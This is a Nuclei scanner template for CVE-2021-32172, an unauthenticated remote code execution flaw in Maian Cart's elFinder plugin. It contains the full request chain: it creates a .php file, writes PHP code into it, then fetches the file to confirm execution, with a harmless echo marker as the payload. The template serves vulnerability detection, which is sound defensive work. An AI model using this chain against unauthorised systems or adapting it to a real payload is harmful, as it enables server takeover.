nuclei-templates/http/cves/2021/CVE-2021-32172.yaml

66 lines
2.1 KiB
YAML

id: CVE-2021-32172
info:
name: Maian Cart <=3.8 - Remote Code Execution
author: pdteam
severity: critical
description: Maian Cart 3.0 to 3.8 via the elFinder file manager plugin contains a remote code execution vulnerability.
remediation: |
Upgrade to a patched version of Maian Cart (>=3.8) to mitigate this vulnerability.
reference:
- https://dreyand.github.io/maian-cart-rce/
- https://github.com/DreyAnd/maian-cart-rce
- https://www.maianscriptworld.co.uk/critical-updates
- https://nvd.nist.gov/vuln/detail/CVE-2021-32172
- https://www.maianscriptworld.co.uk/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-32172
cwe-id: CWE-862
epss-score: 0.26193
epss-percentile: 0.96192
cpe: cpe:2.3:a:maianscriptworld:maian_cart:3.8:*:*:*:*:*:*:*
metadata:
max-request: 3
vendor: maianscriptworld
product: maian_cart
tags: cve,cve2021,rce,unauth,maian,intrusive
http:
- raw:
- |
GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name={{randstr}}.php&target=l1_Lw HTTP/1.1
Host: {{Hostname}}
Accept: */*
- |
POST /admin/index.php?p=ajax-ops&op=elfinder HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
cmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e
- |
GET /product-downloads/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
req-condition: true
matchers:
- type: dsl
dsl:
- contains(body_3, "{{randstr_1}}")
- status_code_3 == 200
condition: and
extractors:
- type: regex
name: hash
group: 1
regex:
- '"hash"\:"(.*?)"\,'
internal: true
# digest: 4a0a00473045022100f24d2f03cfd770eb00c6bd06d7a6126e70d6de4032a1f5788d81ec3450d6e77502202f97d084cb3fe9c44caa71c323878b6775525c465c35bbaa618be17a30d66a8d:922c64590222798bb761d5b6d8e72950